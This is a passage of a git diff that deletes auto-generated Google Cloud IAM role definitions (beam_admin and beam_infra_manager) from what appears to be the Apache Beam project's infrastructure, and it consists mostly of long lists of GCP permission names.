-- compute.instances.stop -- compute.instantSnapshots.delete -- compute.instantSnapshots.setIamPolicy -- compute.interconnectAttachmentGroups.delete -- compute.interconnectAttachments.createTagBinding -- compute.interconnectAttachments.deleteTagBinding -- compute.interconnectGroups.delete -- compute.interconnects.createTagBinding -- compute.interconnects.deleteTagBinding -- compute.interconnects.getMacsecConfig -- compute.licenseCodes.setIamPolicy -- compute.licenses.setIamPolicy -- compute.machineImages.delete -- compute.machineImages.setIamPolicy -- compute.multiMig.delete -- compute.networkAttachments.createTagBinding -- compute.networkAttachments.delete -- compute.networkAttachments.deleteTagBinding -- compute.networkAttachments.setIamPolicy -- compute.networkEdgeSecurityServices.createTagBinding -- compute.networkEdgeSecurityServices.delete -- compute.networkEdgeSecurityServices.deleteTagBinding -- compute.networkEndpointGroups.createTagBinding -- compute.networkEndpointGroups.delete -- compute.networkEndpointGroups.deleteTagBinding -- compute.networks.createTagBinding -- compute.networks.delete -- compute.networks.deleteTagBinding -- compute.nodeGroups.delete -- compute.nodeGroups.setIamPolicy -- compute.nodeTemplates.delete -- compute.nodeTemplates.setIamPolicy -- compute.organizations.disableXpnHost -- compute.organizations.disableXpnResource -- compute.organizations.enableXpnHost -- compute.organizations.enableXpnResource -- compute.packetMirrorings.createTagBinding -- compute.packetMirrorings.delete -- compute.packetMirrorings.deleteTagBinding -- compute.publicAdvertisedPrefixes.delete -- compute.publicDelegatedPrefixes.createTagBinding -- compute.publicDelegatedPrefixes.delete -- compute.publicDelegatedPrefixes.deleteTagBinding -- compute.regionBackendServices.createTagBinding -- compute.regionBackendServices.delete -- compute.regionBackendServices.deleteTagBinding -- compute.regionBackendServices.setIamPolicy -- compute.regionFirewallPolicies.createTagBinding -- compute.regionFirewallPolicies.delete -- compute.regionFirewallPolicies.deleteTagBinding -- compute.regionFirewallPolicies.setIamPolicy -- compute.regionHealthCheckServices.delete -- compute.regionHealthChecks.createTagBinding -- compute.regionHealthChecks.delete -- compute.regionHealthChecks.deleteTagBinding -- compute.regionNetworkEndpointGroups.createTagBinding -- compute.regionNetworkEndpointGroups.delete -- compute.regionNetworkEndpointGroups.deleteTagBinding -- compute.regionNotificationEndpoints.delete -- compute.regionOperations.delete -- compute.regionSecurityPolicies.createTagBinding -- compute.regionSecurityPolicies.delete -- compute.regionSecurityPolicies.deleteTagBinding -- compute.regionSslCertificates.createTagBinding -- compute.regionSslCertificates.delete -- compute.regionSslCertificates.deleteTagBinding -- compute.regionSslPolicies.createTagBinding -- compute.regionSslPolicies.delete -- compute.regionSslPolicies.deleteTagBinding -- compute.regionTargetHttpProxies.createTagBinding -- compute.regionTargetHttpProxies.delete -- compute.regionTargetHttpProxies.deleteTagBinding -- compute.regionTargetHttpsProxies.createTagBinding -- compute.regionTargetHttpsProxies.delete -- compute.regionTargetHttpsProxies.deleteTagBinding -- compute.regionTargetTcpProxies.createTagBinding -- compute.regionTargetTcpProxies.delete -- compute.regionTargetTcpProxies.deleteTagBinding -- compute.regionUrlMaps.createTagBinding -- compute.regionUrlMaps.delete -- compute.regionUrlMaps.deleteTagBinding -- compute.reservations.delete -- compute.resourcePolicies.delete -- compute.resourcePolicies.setIamPolicy -- compute.routers.createTagBinding -- compute.routers.delete -- compute.routers.deleteTagBinding -- compute.routes.createTagBinding -- compute.routes.delete -- compute.routes.deleteTagBinding -- compute.securityPolicies.createTagBinding -- compute.securityPolicies.deleteTagBinding -- compute.serviceAttachments.createTagBinding -- compute.serviceAttachments.delete -- compute.serviceAttachments.deleteTagBinding -- compute.serviceAttachments.setIamPolicy -- compute.snapshots.createTagBinding -- compute.snapshots.delete -- compute.snapshots.deleteTagBinding -- compute.snapshots.setIamPolicy -- compute.sslCertificates.createTagBinding -- compute.sslCertificates.delete -- compute.sslCertificates.deleteTagBinding -- compute.sslPolicies.createTagBinding -- compute.sslPolicies.deleteTagBinding -- compute.storagePools.delete -- compute.storagePools.setIamPolicy -- compute.subnetworks.createTagBinding -- compute.subnetworks.delete -- compute.subnetworks.deleteTagBinding -- compute.subnetworks.setIamPolicy -- compute.targetGrpcProxies.createTagBinding -- compute.targetGrpcProxies.delete -- compute.targetGrpcProxies.deleteTagBinding -- compute.targetHttpProxies.createTagBinding -- compute.targetHttpProxies.delete -- compute.targetHttpProxies.deleteTagBinding -- compute.targetHttpsProxies.createTagBinding -- compute.targetHttpsProxies.delete -- compute.targetHttpsProxies.deleteTagBinding -- compute.targetInstances.createTagBinding -- compute.targetInstances.delete -- compute.targetInstances.deleteTagBinding -- compute.targetPools.createTagBinding -- compute.targetPools.delete -- compute.targetPools.deleteTagBinding -- compute.targetSslProxies.createTagBinding -- compute.targetSslProxies.delete -- compute.targetSslProxies.deleteTagBinding -- compute.targetTcpProxies.createTagBinding -- compute.targetTcpProxies.delete -- compute.targetTcpProxies.deleteTagBinding -- compute.targetVpnGateways.createTagBinding -- compute.targetVpnGateways.delete -- compute.targetVpnGateways.deleteTagBinding -- compute.urlMaps.createTagBinding -- compute.urlMaps.deleteTagBinding -- compute.vpnGateways.createTagBinding -- compute.vpnGateways.delete -- compute.vpnGateways.deleteTagBinding -- compute.vpnTunnels.createTagBinding -- compute.vpnTunnels.delete -- compute.vpnTunnels.deleteTagBinding -- compute.wireGroups.delete -- compute.zoneOperations.delete -- container.apiServices.delete -- container.auditSinks.delete -- container.backendConfigs.delete -- container.certificateSigningRequests.approve -- container.certificateSigningRequests.delete -- container.clusterRoleBindings.create -- container.clusterRoleBindings.delete -- container.clusterRoleBindings.update -- container.clusterRoles.bind -- container.clusterRoles.create -- container.clusterRoles.delete -- container.clusterRoles.update -- container.clusters.createTagBinding -- container.clusters.delete -- container.clusters.deleteTagBinding -- container.configMaps.delete -- container.controllerRevisions.delete -- container.cronJobs.delete -- container.csiDrivers.delete -- container.csiNodeInfos.delete -- container.csiNodes.delete -- container.customResourceDefinitions.delete -- container.daemonSets.delete -- container.deployments.delete -- container.endpointSlices.delete -- container.endpoints.delete -- container.events.delete -- container.frontendConfigs.delete -- container.horizontalPodAutoscalers.delete -- container.hostServiceAgent.use -- container.ingresses.delete -- container.jobs.delete -- container.leases.delete -- container.limitRanges.delete -- container.managedCertificates.delete -- container.mutatingWebhookConfigurations.delete -- container.namespaces.delete -- container.networkPolicies.delete -- container.nodes.delete -- container.persistentVolumeClaims.delete -- container.persistentVolumes.delete -- container.podDisruptionBudgets.delete -- container.podSecurityPolicies.delete -- container.podTemplates.delete -- container.pods.delete -- container.priorityClasses.delete -- container.replicaSets.delete -- container.replicationControllers.delete -- container.resourceQuotas.delete -- container.roleBindings.create -- container.roleBindings.delete -- container.roleBindings.update -- container.roles.bind -- container.roles.create -- container.roles.delete -- container.roles.update -- container.runtimeClasses.delete -- container.secrets.delete -- container.serviceAccounts.delete -- container.services.delete -- container.statefulSets.delete -- container.storageClasses.delete -- container.storageStates.delete -- container.storageVersionMigrations.delete -- container.thirdPartyObjects.delete -- container.updateInfos.delete -- container.validatingWebhookConfigurations.delete -- container.volumeAttachments.delete -- container.volumeSnapshotClasses.delete -- container.volumeSnapshotContents.delete -- container.volumeSnapshots.delete -- containeranalysis.notes.delete -- containeranalysis.notes.setIamPolicy -- containeranalysis.occurrences.delete -- containeranalysis.occurrences.setIamPolicy -- dataflow.jobs.cancel -- dataflow.snapshots.delete -- dataform.commentThreads.delete -- dataform.comments.delete -- dataform.releaseConfigs.delete -- dataform.repositories.delete -- dataform.repositories.setIamPolicy -- dataform.workflowConfigs.delete -- dataform.workflowInvocations.cancel -- dataform.workflowInvocations.delete -- dataform.workspaces.delete -- dataform.workspaces.setIamPolicy -- dataplex.aspectTypes.delete -- dataplex.aspectTypes.setIamPolicy -- dataplex.assets.delete -- dataplex.assets.setIamPolicy -- dataplex.content.delete -- dataplex.content.setIamPolicy -- dataplex.dataAttributeBindings.delete -- dataplex.dataAttributeBindings.setIamPolicy -- dataplex.dataAttributes.delete -- dataplex.dataAttributes.setIamPolicy -- dataplex.dataTaxonomies.delete -- dataplex.dataTaxonomies.setIamPolicy -- dataplex.datascans.delete -- dataplex.datascans.setIamPolicy -- dataplex.entities.delete -- dataplex.entries.delete -- dataplex.entryGroups.delete -- dataplex.entryGroups.setIamPolicy -- dataplex.entryLinks.delete -- dataplex.entryTypes.delete -- dataplex.entryTypes.setIamPolicy -- dataplex.environments.delete -- dataplex.environments.setIamPolicy -- dataplex.glossaries.delete -- dataplex.glossaries.setIamPolicy -- dataplex.glossaryCategories.delete -- dataplex.glossaryTerms.delete -- dataplex.lakes.delete -- dataplex.lakes.setIamPolicy -- dataplex.metadataJobs.cancel -- dataplex.operations.cancel -- dataplex.operations.delete -- dataplex.partitions.delete -- dataplex.tasks.cancel -- dataplex.tasks.delete -- dataplex.tasks.setIamPolicy -- dataplex.zones.delete -- dataplex.zones.setIamPolicy -- dataproc.agents.delete -- dataproc.autoscalingPolicies.delete -- dataproc.autoscalingPolicies.setIamPolicy -- dataproc.batches.cancel -- dataproc.batches.delete -- dataproc.clusters.delete -- dataproc.clusters.setIamPolicy -- dataproc.clusters.stop -- dataproc.jobs.cancel -- dataproc.jobs.delete -- dataproc.jobs.setIamPolicy -- dataproc.operations.cancel -- dataproc.operations.delete -- dataproc.operations.setIamPolicy -- dataproc.sessionTemplates.delete -- dataproc.sessions.delete -- dataproc.sessions.terminate -- dataproc.workflowTemplates.delete -- dataproc.workflowTemplates.setIamPolicy -- dataprocrm.nodePools.delete -- dataprocrm.operations.cancel -- dataprocrm.operations.delete -- dataprocrm.workloads.cancel -- dataprocrm.workloads.delete -- datastore.backupSchedules.delete -- datastore.backups.delete -- datastore.backups.restoreDatabase -- datastore.databases.bulkDelete -- datastore.databases.clone -- datastore.databases.create -- datastore.databases.createTagBinding -- datastore.databases.delete -- datastore.databases.deleteTagBinding -- datastore.databases.export -- datastore.databases.import -- datastore.entities.delete -- datastore.indexes.delete -- datastore.locations.get -- datastore.locations.list -- datastore.operations.cancel -- datastore.operations.delete -- datastore.userCreds.delete -- dns.managedZones.delete -- dns.managedZones.setIamPolicy -- dns.policies.delete -- dns.resourceRecordSets.delete -- dns.responsePolicies.delete -- dns.responsePolicyRules.delete -- firebase.billingPlans.update -- firebase.clients.delete -- firebase.links.create -- firebase.links.delete -- firebase.links.update -- firebase.playLinks.update -- firebase.projects.delete -- firebaseabt.experiments.delete -- firebaseappcheck.appCheckTokens.verify -- firebaseappcheck.automations.delete -- firebaseauth.users.delete -- firebasedatabase.instances.delete -- firebasedataconnect.connectorRevisions.delete -- firebasedataconnect.connectors.delete -- firebasedataconnect.operations.cancel -- firebasedataconnect.operations.delete -- firebasedataconnect.schemaRevisions.delete -- firebasedataconnect.schemas.delete -- firebasedataconnect.services.delete -- firebasedynamiclinks.destinations.update -- firebasedynamiclinks.domains.delete -- firebaseextensions.configs.create -- firebaseextensions.configs.delete -- firebaseextensions.configs.update -- firebaseextensionspublisher.extensions.delete -- firebasehosting.sites.delete -- firebaseinappmessaging.campaigns.delete -- firebasemessagingcampaigns.campaigns.delete -- firebasemessagingcampaigns.campaigns.stop -- firebaseml.models.delete -- firebasenotifications.messages.delete -- firebaserules.releases.delete -- firebaserules.rulesets.delete -- firebasestorage.defaultBucket.delete -- iam.googleapis.com/workloadIdentityPoolProviderKeys.create -- iam.googleapis.com/workloadIdentityPoolProviderKeys.delete -- iam.googleapis.com/workloadIdentityPoolProviderKeys.undelete -- iam.googleapis.com/workloadIdentityPoolProviders.create -- iam.googleapis.com/workloadIdentityPoolProviders.delete -- iam.googleapis.com/workloadIdentityPoolProviders.undelete -- iam.googleapis.com/workloadIdentityPoolProviders.update -- iam.googleapis.com/workloadIdentityPools.create -- iam.googleapis.com/workloadIdentityPools.delete -- iam.googleapis.com/workloadIdentityPools.undelete -- iam.googleapis.com/workloadIdentityPools.update -- iam.roles.create -- iam.roles.delete -- iam.roles.undelete -- iam.roles.update -- iam.serviceAccountApiKeyBindings.delete -- iam.serviceAccountKeys.delete -- iam.serviceAccounts.createTagBinding -- iam.serviceAccounts.delete -- iam.serviceAccounts.deleteTagBinding -- iam.serviceAccounts.setIamPolicy -- iam.serviceAccounts.undelete -- iap.tunnel.getIamPolicy -- iap.tunnel.setIamPolicy -- iap.tunnelDestGroups.delete -- iap.tunnelDestGroups.getIamPolicy -- iap.tunnelDestGroups.setIamPolicy -- iap.tunnelInstances.getIamPolicy -- iap.tunnelInstances.setIamPolicy -- iap.tunnelLocations.getIamPolicy -- iap.tunnelLocations.setIamPolicy -- iap.tunnelZones.getIamPolicy -- iap.tunnelZones.setIamPolicy -- iap.web.getIamPolicy -- iap.web.setIamPolicy -- iap.webServiceVersions.getIamPolicy -- iap.webServiceVersions.setIamPolicy -- iap.webServices.getIamPolicy -- iap.webServices.setIamPolicy -- iap.webTypes.getIamPolicy -- iap.webTypes.setIamPolicy -- monitoring.alertPolicies.createTagBinding -- monitoring.alertPolicies.delete -- monitoring.alertPolicies.deleteTagBinding -- monitoring.dashboards.createTagBinding -- monitoring.dashboards.delete -- monitoring.dashboards.deleteTagBinding -- monitoring.groups.delete -- monitoring.metricDescriptors.delete -- monitoring.metricsScopes.link -- monitoring.services.delete -- monitoring.slos.delete -- monitoring.uptimeCheckConfigs.delete -- pubsub.schemas.delete -- pubsub.schemas.setIamPolicy -- pubsub.snapshots.delete -- pubsub.subscriptions.delete -- pubsub.subscriptions.getIamPolicy -- pubsub.subscriptions.setIamPolicy -- pubsub.topics.delete -- pubsub.topics.getIamPolicy -- pubsub.topics.setIamPolicy -- pubsublite.reservations.delete -- pubsublite.subscriptions.delete -- pubsublite.topics.delete -- redis.backupCollections.delete -- redis.backups.delete -- redis.clusters.delete -- redis.instances.createTagBinding -- redis.instances.delete -- redis.instances.deleteTagBinding -- redis.operations.cancel -- redis.operations.delete -- resourcemanager.projects.setIamPolicy -- resourcemanager.tagHolds.delete -- resourcemanager.tagKeys.delete -- resourcemanager.tagKeys.setIamPolicy -- resourcemanager.tagValueBindings.delete -- resourcemanager.tagValues.delete -- resourcemanager.tagValues.setIamPolicy -- secretmanager.secrets.createTagBinding -- secretmanager.secrets.delete -- secretmanager.secrets.deleteTagBinding -- secretmanager.secrets.setIamPolicy -- secretmanager.versions.access -- secretmanager.versions.destroy -- servicemanagement.services.delete -- servicemanagement.services.getIamPolicy -- servicemanagement.services.setIamPolicy -- spanner.backupOperations.cancel -- spanner.backupSchedules.delete -- spanner.backupSchedules.setIamPolicy -- spanner.backups.delete -- spanner.backups.setIamPolicy -- spanner.databaseOperations.cancel -- spanner.databases.setIamPolicy -- spanner.instanceConfigOperations.cancel -- spanner.instanceConfigOperations.delete -- spanner.instanceConfigs.delete -- spanner.instanceOperations.cancel -- spanner.instanceOperations.delete -- spanner.instancePartitionOperations.cancel -- spanner.instancePartitionOperations.delete -- spanner.instancePartitions.delete -- spanner.instances.createTagBinding -- spanner.instances.delete -- spanner.instances.deleteTagBinding -- spanner.instances.setIamPolicy -- spanner.sessions.delete -- storage.anywhereCaches.create -- storage.anywhereCaches.disable -- storage.anywhereCaches.get -- storage.anywhereCaches.list -- storage.anywhereCaches.pause -- storage.anywhereCaches.resume -- storage.anywhereCaches.update -- storage.bucketOperations.cancel -- storage.bucketOperations.get -- storage.bucketOperations.list -- storage.buckets.createTagBinding -- storage.buckets.delete -- storage.buckets.deleteTagBinding -- storage.buckets.enableObjectRetention -- storage.buckets.get -- storage.buckets.getIamPolicy -- storage.buckets.getIpFilter -- storage.buckets.getObjectInsights -- storage.buckets.relocate -- storage.buckets.restore -- storage.buckets.setIamPolicy -- storage.buckets.setIpFilter -- storage.buckets.update -- storage.folders.delete -- storage.hmacKeys.delete -- storage.intelligenceConfigs.update -- storage.managedFolders.delete -- storage.managedFolders.getIamPolicy -- storage.managedFolders.setIamPolicy -- storage.multipartUploads.list -- storage.objects.delete -- storage.objects.getIamPolicy -- storage.objects.move -- storage.objects.overrideUnlockedRetention -- storage.objects.restore -- storage.objects.setIamPolicy -- storage.objects.setRetention -- storage.objects.update -- storageinsights.datasetConfigs.delete -- storageinsights.operations.cancel -- storageinsights.operations.delete -- storageinsights.reportConfigs.delete -- storagetransfer.agentpools.delete -- storagetransfer.jobs.delete -- storagetransfer.operations.cancel -role_id: beam_admin -stage: GA -title: beam_admin diff --git a/infra/iam/roles/beam_infra_manager.role.yaml b/infra/iam/roles/beam_infra_manager.role.yaml deleted file mode 100644 index 169bebd7fbc3..000000000000 --- a/infra/iam/roles/beam_infra_manager.role.yaml +++ /dev/null @@ -1,848 +0,0 @@ -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This file is auto-generated by generate_roles.py. -# Do not edit manually. - -# This file was generated on 2025-08-11 14:34:54 UTC - -description: This is the beam_infra_manager role -permissions: -- artifactregistry.aptartifacts.create -- artifactregistry.attachments.create -- artifactregistry.files.update -- artifactregistry.files.upload -- artifactregistry.kfpartifacts.create -- artifactregistry.packages.update -- artifactregistry.projectsettings.update -- artifactregistry.repositories.create -- artifactregistry.repositories.createOnPush -- artifactregistry.repositories.deleteArtifacts -- artifactregistry.repositories.update -- artifactregistry.repositories.uploadArtifacts -- artifactregistry.rules.create -- artifactregistry.rules.update -- artifactregistry.tags.create -- artifactregistry.tags.update -- artifactregistry.versions.update -- artifactregistry.yumartifacts.create -- biglake.catalogs.create -- biglake.databases.create -- biglake.databases.update -- biglake.locks.check -- biglake.locks.create -- biglake.namespaces.create -- biglake.namespaces.update -- biglake.tables.create -- biglake.tables.lock -- biglake.tables.update -- biglake.tables.updateData -- bigquery.bireservations.update -- bigquery.capacityCommitments.update -- bigquery.config.update -- bigquery.connections.create -- bigquery.connections.update -- bigquery.connections.updateTag -- bigquery.dataPolicies.create -- bigquery.dataPolicies.update -- bigquery.datasets.updateTag -- bigquery.models.create -- bigquery.models.updateData -- bigquery.models.updateMetadata -- bigquery.models.updateTag -- bigquery.objectRefs.write -- bigquery.reservationAssignments.create -- bigquery.reservationGroups.create -- bigquery.reservations.create -- bigquery.reservations.update -- bigquery.routines.create -- bigquery.routines.update -- bigquery.routines.updateTag -- bigquery.rowAccessPolicies.create -- bigquery.rowAccessPolicies.update -- bigquery.savedqueries.create -- bigquery.savedqueries.update -- bigquery.tables.createIndex -- bigquery.tables.deleteIndex -- bigquery.tables.restoreSnapshot -- bigquery.tables.updateIndex -- bigquery.transfers.update -- bigquerymigration.workflows.create -- bigquerymigration.workflows.enableAiOutputTypes -- bigquerymigration.workflows.enableLineageOutputTypes -- bigquerymigration.workflows.enableOutputTypePermissions -- bigquerymigration.workflows.update -- cloudasset.othercloudconnections.create -- cloudasset.othercloudconnections.update -- cloudasset.othercloudconnections.verify -- cloudasset.savedqueries.create -- cloudasset.savedqueries.update -- cloudbuild.builds.approve -- cloudbuild.builds.create -- cloudbuild.builds.update -- cloudbuild.connections.create -- cloudbuild.connections.update -- cloudbuild.integrations.create -- cloudbuild.integrations.update -- cloudbuild.repositories.create -- cloudbuild.workerpools.create -- cloudbuild.workerpools.update -- cloudbuild.workerpools.use -- cloudfunctions.functions.call -- cloudfunctions.functions.create -- cloudfunctions.functions.generationUpgrade -- cloudfunctions.functions.invoke -- cloudfunctions.functions.sourceCodeSet -- cloudfunctions.functions.update -- cloudkms.cryptoKeyVersions.create -- cloudkms.cryptoKeyVersions.update -- cloudkms.cryptoKeys.create -- cloudkms.cryptoKeys.update -- cloudkms.ekmConfigs.update -- cloudkms.ekmConnections.create -- cloudkms.ekmConnections.update -- cloudkms.ekmConnections.use -- cloudkms.importJobs.create -- cloudkms.importJobs.useToImport -- cloudkms.kajPolicyConfigs.update -- cloudkms.keyRings.create -- cloudsql.backupRuns.create -- cloudsql.backupRuns.update -- cloudsql.databases.create -- cloudsql.databases.update -- cloudsql.instances.addServerCa -- cloudsql.instances.addServerCertificate -- cloudsql.instances.clone -- cloudsql.instances.connect -- cloudsql.instances.create -- cloudsql.instances.demoteMaster -- cloudsql.instances.executeSql -- cloudsql.instances.failover -- cloudsql.instances.import -- cloudsql.instances.migrate -- cloudsql.instances.performDiskShrink -- cloudsql.instances.promoteReplica -- cloudsql.instances.reencrypt -- cloudsql.instances.resetReplicaSize -- cloudsql.instances.resetSslConfig -- cloudsql.instances.restart -- cloudsql.instances.restoreBackup -- cloudsql.instances.rotateServerCa -- cloudsql.instances.rotateServerCertificate -- cloudsql.instances.startReplica -- cloudsql.instances.stopReplica -- cloudsql.instances.truncateLog -- cloudsql.instances.update -- cloudsql.instances.updateBackupDrConfig -- cloudsql.sslCerts.create -- cloudsql.users.create -- cloudsql.users.update -- compute.addresses.create -- compute.addresses.use -- compute.autoscalers.create -- compute.autoscalers.update -- compute.backendBuckets.addSignedUrlKey -- compute.backendBuckets.create -- compute.backendBuckets.deleteSignedUrlKey -- compute.backendBuckets.setSecurityPolicy -- compute.backendBuckets.update -- compute.backendBuckets.use -- compute.backendServices.addSignedUrlKey -- compute.backendServices.create -- compute.backendServices.deleteSignedUrlKey -- compute.backendServices.setSecurityPolicy -- compute.backendServices.update -- compute.backendServices.use -- compute.commitments.create -- compute.commitments.update -- compute.commitments.updateReservations -- compute.crossSiteNetworks.create -- compute.crossSiteNetworks.update -- compute.diskSettings.update -- compute.disks.addResourcePolicies -- compute.disks.create -- compute.disks.removeResourcePolicies -- compute.disks.resize -- compute.disks.setLabels -- compute.disks.startAsyncReplication -- compute.disks.stopAsyncReplication -- compute.disks.stopGroupAsyncReplication -- compute.disks.update -- compute.disks.use -- compute.externalVpnGateways.create -- compute.externalVpnGateways.setLabels -- compute.externalVpnGateways.use -- compute.firewallPolicies.cloneRules -- compute.firewallPolicies.create -- compute.firewallPolicies.update -- compute.firewallPolicies.use -- compute.firewalls.create -- compute.firewalls.update -- compute.forwardingRules.create -- compute.forwardingRules.pscCreate -- compute.forwardingRules.pscDelete -- compute.forwardingRules.pscSetLabels -- compute.forwardingRules.pscUpdate -- compute.forwardingRules.setTarget -- compute.forwardingRules.update -- compute.forwardingRules.use -- compute.futureReservations.create -- compute.futureReservations.update -- compute.globalAddresses.create -- compute.globalAddresses.createInternal -- compute.globalAddresses.deleteInternal -- compute.globalAddresses.use -- compute.globalForwardingRules.create -- compute.globalForwardingRules.pscCreate -- compute.globalForwardingRules.pscDelete -- compute.globalForwardingRules.pscSetLabels -- compute.globalForwardingRules.pscUpdate -- compute.globalForwardingRules.update -- compute.globalNetworkEndpointGroups.attachNetworkEndpoints -- compute.globalNetworkEndpointGroups.create -- compute.globalNetworkEndpointGroups.detachNetworkEndpoints -- compute.globalNetworkEndpointGroups.use -- compute.globalPublicDelegatedPrefixes.create -- compute.globalPublicDelegatedPrefixes.updatePolicy -- compute.healthChecks.create -- compute.healthChecks.update -- compute.healthChecks.use -- compute.httpHealthChecks.create -- compute.httpHealthChecks.update -- compute.httpsHealthChecks.create -- compute.httpsHealthChecks.update -- compute.images.create -- compute.images.deprecate -- compute.images.setLabels -- compute.images.update -- compute.instanceGroupManagers.create -- compute.instanceGroupManagers.update -- compute.instanceGroupManagers.use -- compute.instanceGroups.create -- compute.instanceGroups.update -- compute.instanceGroups.use -- compute.instanceSettings.update -- compute.instanceTemplates.create -- compute.instances.addAccessConfig -- compute.instances.addNetworkInterface -- compute.instances.addResourcePolicies -- compute.instances.attachDisk -- compute.instances.create -- compute.instances.deleteAccessConfig -- compute.instances.deleteNetworkInterface -- compute.instances.detachDisk -- compute.instances.osAdminLogin -- compute.instances.osLogin -- compute.instances.pscInterfaceCreate -- compute.instances.removeResourcePolicies -- compute.instances.reset -- compute.instances.resume -- compute.instances.sendDiagnosticInterrupt -- compute.instances.setDiskAutoDelete -- compute.instances.setLabels -- compute.instances.setMachineResources -- compute.instances.setMachineType -- compute.instances.setMetadata -- compute.instances.setMinCpuPlatform -- compute.instances.setName -- compute.instances.setScheduling -- compute.instances.setSecurityPolicy -- compute.instances.setServiceAccount -- compute.instances.setShieldedInstanceIntegrityPolicy -- compute.instances.setShieldedVmIntegrityPolicy -- compute.instances.setTags -- compute.instances.simulateMaintenanceEvent -- compute.instances.start -- compute.instances.startWithEncryptionKey -- compute.instances.suspend -- compute.instances.update -- compute.instances.updateAccessConfig -- compute.instances.updateDisplayDevice -- compute.instances.updateNetworkInterface -- compute.instances.updateSecurity -- compute.instances.updateShieldedInstanceConfig -- compute.instances.updateShieldedVmConfig -- compute.instances.use -- compute.instantSnapshots.create -- compute.instantSnapshots.export -- compute.instantSnapshots.setLabels -- compute.interconnectAttachmentGroups.create -- compute.interconnectAttachmentGroups.patch -- compute.interconnectGroups.create -- compute.interconnectGroups.patch -- compute.licenses.update -- compute.machineImages.create -- compute.machineImages.setLabels -- compute.multiMig.create -- compute.networkAttachments.create -- compute.networkAttachments.update -- compute.networkAttachments.use -- compute.networkEdgeSecurityServices.create -- compute.networkEdgeSecurityServices.update -- compute.networkEndpointGroups.attachNetworkEndpoints -- compute.networkEndpointGroups.create -- compute.networkEndpointGroups.detachNetworkEndpoints -- compute.networkEndpointGroups.use -- compute.networks.access -- compute.networks.create -- compute.networks.mirror -- compute.networks.setFirewallPolicy -- compute.networks.updatePeering -- compute.networks.updatePolicy -- compute.networks.use -- compute.networks.useExternalIp -- compute.nodeGroups.addNodes -- compute.nodeGroups.create -- compute.nodeGroups.deleteNodes -- compute.nodeGroups.performMaintenance -- compute.nodeGroups.setNodeTemplate -- compute.nodeGroups.simulateMaintenanceEvent -- compute.nodeGroups.update -- compute.nodeTemplates.create -- compute.organizations.setFirewallPolicy -- compute.organizations.setSecurityPolicy -- compute.packetMirrorings.create -- compute.packetMirrorings.update -- compute.previewFeatures.update -- compute.projects.setCloudArmorTier -- compute.projects.setCommonInstanceMetadata -- compute.projects.setManagedProtectionTier -- compute.projects.setUsageExportBucket -- compute.publicAdvertisedPrefixes.create -- compute.publicAdvertisedPrefixes.update -- compute.publicAdvertisedPrefixes.updatePolicy -- compute.publicDelegatedPrefixes.create -- compute.publicDelegatedPrefixes.update -- compute.publicDelegatedPrefixes.updatePolicy -- compute.publicDelegatedPrefixes.use -- compute.regionBackendServices.create -- compute.regionBackendServices.setSecurityPolicy -- compute.regionBackendServices.update -- compute.regionBackendServices.use -- compute.regionFirewallPolicies.cloneRules -- compute.regionFirewallPolicies.create -- compute.regionFirewallPolicies.update -- compute.regionFirewallPolicies.use -- compute.regionHealthCheckServices.create -- compute.regionHealthCheckServices.update -- compute.regionHealthCheckServices.use -- compute.regionHealthChecks.create -- compute.regionHealthChecks.update -- compute.regionHealthChecks.use -- compute.regionNetworkEndpointGroups.attachNetworkEndpoints -- compute.regionNetworkEndpointGroups.create -- compute.regionNetworkEndpointGroups.detachNetworkEndpoints -- compute.regionNetworkEndpointGroups.use -- compute.regionNotificationEndpoints.create -- compute.regionNotificationEndpoints.update -- compute.regionNotificationEndpoints.use -- compute.regionSecurityPolicies.create -- compute.regionSecurityPolicies.update -- compute.regionSecurityPolicies.use -- compute.regionSslCertificates.create -- compute.regionSslPolicies.create -- compute.regionSslPolicies.update -- compute.regionSslPolicies.use -- compute.regionTargetHttpProxies.create -- compute.regionTargetHttpProxies.setUrlMap -- compute.regionTargetHttpProxies.use -- compute.regionTargetHttpsProxies.create -- compute.regionTargetHttpsProxies.setSslCertificates -- compute.regionTargetHttpsProxies.setUrlMap -- compute.regionTargetHttpsProxies.update -- compute.regionTargetHttpsProxies.use -- compute.regionTargetTcpProxies.create -- compute.regionTargetTcpProxies.use -- compute.regionUrlMaps.create -- compute.regionUrlMaps.invalidateCache -- compute.regionUrlMaps.update -- compute.regionUrlMaps.use -- compute.reservationBlocks.performMaintenance -- compute.reservationSubBlocks.performMaintenance -- compute.reservations.create -- compute.reservations.performMaintenance -- compute.reservations.resize -- compute.reservations.update -- compute.resourcePolicies.create -- compute.resourcePolicies.update -- compute.resourcePolicies.use -- compute.routers.create -- compute.routers.deleteRoutePolicy -- compute.routers.update -- compute.routers.updateRoutePolicy -- compute.routers.use -- compute.routes.create -- compute.securityPolicies.setLabels -- compute.serviceAttachments.create -- compute.serviceAttachments.update -- compute.serviceAttachments.use -- compute.snapshotSettings.update -- compute.snapshots.create -- compute.snapshots.setLabels -- compute.sslCertificates.create -- compute.storagePools.create -- compute.storagePools.update -- compute.storagePools.use -- compute.subnetworks.create -- compute.subnetworks.expandIpCidrRange -- compute.subnetworks.mirror -- compute.subnetworks.setPrivateIpGoogleAccess -- compute.subnetworks.update -- compute.subnetworks.use -- compute.subnetworks.useExternalIp -- compute.subnetworks.usePeerMigration -- compute.targetGrpcProxies.create -- compute.targetGrpcProxies.update -- compute.targetGrpcProxies.use -- compute.targetHttpProxies.create -- compute.targetHttpProxies.setUrlMap -- compute.targetHttpProxies.update -- compute.targetHttpProxies.use -- compute.targetHttpsProxies.create -- compute.targetHttpsProxies.setCertificateMap -- compute.targetHttpsProxies.setQuicOverride -- compute.targetHttpsProxies.setSslCertificates -- compute.targetHttpsProxies.setUrlMap -- compute.targetHttpsProxies.update -- compute.targetHttpsProxies.use -- compute.targetInstances.create -- compute.targetInstances.setSecurityPolicy -- compute.targetInstances.use -- compute.targetPools.addHealthCheck -- compute.targetPools.addInstance -- compute.targetPools.create -- compute.targetPools.removeHealthCheck -- compute.targetPools.removeInstance -- compute.targetPools.setSecurityPolicy -- compute.targetPools.update -- compute.targetPools.use -- compute.targetSslProxies.create -- 